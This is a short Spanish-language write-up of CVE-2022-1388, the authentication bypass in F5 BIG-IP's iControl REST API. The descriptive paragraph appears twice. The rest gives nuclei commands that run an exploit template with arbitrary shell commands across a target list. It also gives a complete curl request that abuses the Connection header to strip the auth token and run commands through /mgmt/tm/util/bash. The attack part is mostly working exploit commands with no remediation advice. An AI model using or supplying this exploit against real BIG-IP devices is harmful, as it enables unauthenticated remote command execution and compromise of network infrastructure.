
CVE-2022-1388 es una vulnerabilidad de omisión de autenticación en el componente REST de la API iControl de BIG-IP, a la que se le asignó una puntuación CVSSv3 de 9.8. La API REST de iControl se utiliza para la gestión y configuración de dispositivos BIG-IP. CVE-2022-1388 podría ser explotada por un atacante no autenticado con acceso de red al puerto de gestión o a las direcciones IP propias de los dispositivos que utilizan BIG-IP. La explotación permitiría al atacante ejecutar comandos arbitrarios del sistema, crear y eliminar archivos y deshabilitar servicios.
CVE-2022-1388 es una vulnerabilidad de omisión de autenticación en el componente REST de la API iControl de BIG-IP que recibió una puntuación CVSSv3 de 9.8. La API REST de iControl se utiliza para la gestión y configuración de dispositivos BIG-IP. CVE-2022-1388 podría ser explotada por un atacante no autenticado con acceso de red al puerto de gestión o direcciones IP propias de los dispositivos que utilizan BIG-IP. La explotación permitiría al atacante ejecutar comandos arbitrarios del sistema, crear y eliminar archivos y deshabilitar servicios.
Esta plantilla de nuclei acepta parámetros de shell para la explotación. Queríamos probar tokens obtenidos de otro flujo de trabajo o de una búsqueda manual, por lo que utilizamos la función de variable CLI de nuclei para alimentar dinámicamente un solo valor de token o una lista de tokens en estas plantillas en tiempo de ejecución.
-V, -var value variables personalizadas en formato var=valor
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

curl -su admin \
-H "Host: localhost:8100" \
-H "Content-Type: application/json" \
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \
-H "Authorization: Basic YWRtaW46" \
http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'